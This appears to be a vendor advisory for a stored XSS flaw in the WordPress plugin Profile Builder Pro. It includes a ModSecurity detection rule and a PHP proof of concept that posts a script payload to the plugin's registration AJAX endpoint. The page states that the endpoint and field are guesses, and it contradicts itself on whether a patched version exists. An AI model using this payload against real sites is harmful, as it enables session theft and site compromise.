What is CVE-2026-42385?

CVE-2026-42385 is a high-severity vulnerability affecting the Profile Builder Pro plugin for WordPress, specifically versions up to and including 3.15.0. It allows unauthenticated attackers to exploit stored cross-site scripting (XSS) due to insufficient input sanitization and output escaping.

How does the vulnerability work?

The vulnerability enables attackers to inject arbitrary web scripts into pages that are stored in the WordPress database. When a user accesses the affected pages, the injected scripts execute in their browser, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using Profile Builder Pro version 3.15.0 or earlier is at risk. This includes sites that allow user registrations or profile updates through the plugin without proper authentication and input validation.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Profile Builder Pro plugin installed. If it is version 3.15.0 or earlier, your site is at risk. Additionally, review any custom implementations that may expose vulnerable endpoints.

What steps should I take to fix this issue?

Upgrade the Profile Builder Pro plugin to version 3.15.1 or later, which includes fixes for this vulnerability. Additionally, review your site’s code for proper input sanitization and output escaping practices, particularly in areas where user data is processed.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the affected system, allowing attackers to exploit it with relatively low effort and no authentication required.

What are the practical risks of this vulnerability?

Successful exploitation can lead to the execution of arbitrary JavaScript in a victim’s browser, resulting in session cookie theft, redirection to malicious sites, or defacement of content. The stored nature of the XSS means that all visitors to the site could be affected.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can send a crafted request to a vulnerable AJAX endpoint, such as ‘wppb_register’. It shows how an attacker can inject a script payload that is stored and later rendered without escaping, leading to XSS in users’ browsers.

What input sanitization practices should be implemented?

Developers should use WordPress functions such as ‘sanitize_text_field()’ for input sanitization and ‘esc_html()’ or ‘wp_kses()’ for output escaping. Implementing nonce verification and capability checks for unauthenticated requests is also crucial to enhance security.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. When users access the affected content, the scripts execute in their browsers, potentially compromising their security.

How can I further protect my WordPress site?

In addition to updating vulnerable plugins, regularly audit your WordPress installation for security best practices. Use security plugins, implement web application firewalls, and conduct regular security assessments to safeguard against vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-42385: Profile Builder Pro <= 3.15.0 – Unauthenticated Stored Cross-Site Scripting (profile-builder-pro)

CVE ID CVE-2026-42385

Plugin profile-builder-pro

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 3.15.0

Patched Version —

Disclosed April 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42385 (metadata-based):

This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the Profile Builder Pro plugin for WordPress, version 3.15.0 and earlier. It allows remote attackers to inject arbitrary web scripts without requiring authentication. The CVSS 3.1 score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) indicates a serious threat due to the network-based, low-complexity, no-authentication requirements and the changed scope (confidentiality and integrity impact on other resources).

Root Cause: The description identifies insufficient input sanitization and output escaping as the root cause. Based on the CWE classification (79) and the common patterns in WordPress plugin XSS vulnerabilities, Atomic Edge research infers the issue likely resides in a plugin-specific functionality that accepts user-controlled data (e.g., form fields, profile updates, or shortcode attributes) and stores it without proper sanitization. The absence of authentication requirement suggests the vulnerable function does not perform capability checks or nonce verification before processing the input. The stored nature means the payload persists in the WordPress database (e.g., via user meta, post meta, or custom table) and gets rendered in administrator-facing pages or front-end templates.

Exploitation: An unauthenticated attacker can exploit this vulnerability by submitting a crafted request to a vulnerable endpoint that the plugin exposes. Likely targets include AJAX actions such as `wppb_register` or `wppb_update_profile` (common Profile Builder patterns), or any shortcode-based form handler that does not require login. The attacker would supply a payload like `alert(‘XSS’)` or a more sophisticated JavaScript payload (e.g., for session hijacking) in a field that the plugin stores and later displays without HTML escaping. The payload executes in the browser of any user viewing the injected content, including administrators.

Remediation: The fix in version 3.15.1 almost certainly involves adding proper input sanitization using WordPress functions like `sanitize_text_field()` or `wp_kses()` for rich content, and output escaping using functions like `esc_html()`, `esc_attr()`, or `wp_kses_post()` when rendering the stored data. Developers should also add nonce verification and capability checks to endpoints processing unauthenticated requests to prevent arbitrary data submissions. The plugin maintainer must audit all instances where user input is stored and rendered without escaping.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim’s browser session. This can lead to theft of session cookies, redirection to malicious sites, defacement of WordPress pages, or extraction of sensitive data displayed on the page. Since the XSS is stored and affects all visitors, the attack can spread across multiple users without repeated exploitation attempts. The changed scope in the CVSS vector indicates the affected component (the plugin’s data store) is separate from the vulnerable component, meaning an attacker can impact resources beyond the initial application boundaries.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-42385 (metadata-based)
# Block unauthenticated XSS payloads via Profile Builder Pro registration AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261985,phase:2,deny,status:403,chain,msg:'CVE-2026-42385 - Profile Builder Pro Stored XSS via wppb_register',severity:'CRITICAL',tag:'CVE-2026-42385'"
  SecRule ARGS_POST:action "@streq wppb_register" 
    "chain"
    SecRule ARGS_POST:first_name "@rx <script[^>]*>.*</script>" 
      "t:none,t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42385 - Profile Builder Pro <= 3.15.0 - Unauthenticated Stored XSS

/*
 * This PoC demonstrates exploitation of the unauthenticated stored XSS
 * vulnerability. It targets a likely AJAX endpoint (wppb_register) used by
 * the Profile Builder plugin for user registration forms. The payload is
 * injected into a field that is stored and later rendered without escaping.
 *
 * Assumptions:
 * 1. The plugin uses admin-ajax.php with action 'wppb_register' for
 *    registration handling (common for this plugin).
 * 2. The 'first_name' field is insufficiently sanitized and stored.
 * 3. The victim site displays the submitted data on a profile page or
 *    admin panel.
 *
 * If the actual endpoint differs, modify $action below.
 */

// Configuration
$target_url = 'http://example.com';  // CHANGE THIS to the target WordPress site
$action = 'wppb_register';           // AJAX action for registration
$payload = '<script>alert("CVE-2026-42385");</script>';  // XSS payload

// Build request data
$data = array(
    'action'     => $action,
    'first_name' => $payload,       // Injected XSS payload
    'last_name'  => 'Test',
    'email'      => 'attacker@example.com',  // Valid format to bypass basic checks
    'username'   => 'testuser_' . time(),
    'password'   => 'P@ssw0rd123!',
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check result
if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[*] Exploit delivered successfully.n";
    echo "[*] Payload: $payloadn";
    echo "[*] Check any page displaying user data (e.g., admin users list).n";
} else {
    echo "[-] Request failed. HTTP code: $http_coden";
    echo "[-] Response: $responsen";
    echo "[*] Note: The exact endpoint may differ. If no success, try other actions.n";
}

?>

Frequently Asked Questions

What is CVE-2026-42385?
Understanding the vulnerability
CVE-2026-42385 is a high-severity vulnerability affecting the Profile Builder Pro plugin for WordPress, specifically versions up to and including 3.15.0. It allows unauthenticated attackers to exploit stored cross-site scripting (XSS) due to insufficient input sanitization and output escaping.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability enables attackers to inject arbitrary web scripts into pages that are stored in the WordPress database. When a user accesses the affected pages, the injected scripts execute in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using Profile Builder Pro version 3.15.0 or earlier is at risk. This includes sites that allow user registrations or profile updates through the plugin without proper authentication and input validation.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To determine if your site is vulnerable, check the version of the Profile Builder Pro plugin installed. If it is version 3.15.0 or earlier, your site is at risk. Additionally, review any custom implementations that may expose vulnerable endpoints.
What steps should I take to fix this issue?
Remediation actions
Upgrade the Profile Builder Pro plugin to version 3.15.1 or later, which includes fixes for this vulnerability. Additionally, review your site’s code for proper input sanitization and output escaping practices, particularly in areas where user data is processed.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the affected system, allowing attackers to exploit it with relatively low effort and no authentication required.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Successful exploitation can lead to the execution of arbitrary JavaScript in a victim’s browser, resulting in session cookie theft, redirection to malicious sites, or defacement of content. The stored nature of the XSS means that all visitors to the site could be affected.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept illustrates how an attacker can send a crafted request to a vulnerable AJAX endpoint, such as ‘wppb_register’. It shows how an attacker can inject a script payload that is stored and later rendered without escaping, leading to XSS in users’ browsers.
What input sanitization practices should be implemented?
Best practices for secure coding
Developers should use WordPress functions such as ‘sanitize_text_field()’ for input sanitization and ‘esc_html()’ or ‘wp_kses()’ for output escaping. Implementing nonce verification and capability checks for unauthenticated requests is also crucial to enhance security.
What is stored cross-site scripting (XSS)?
Defining the vulnerability type
Stored XSS is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. When users access the affected content, the scripts execute in their browsers, potentially compromising their security.
How can I further protect my WordPress site?
Additional security measures
In addition to updating vulnerable plugins, regularly audit your WordPress installation for security best practices. Use security plugins, implement web application firewalls, and conduct regular security assessments to safeguard against vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations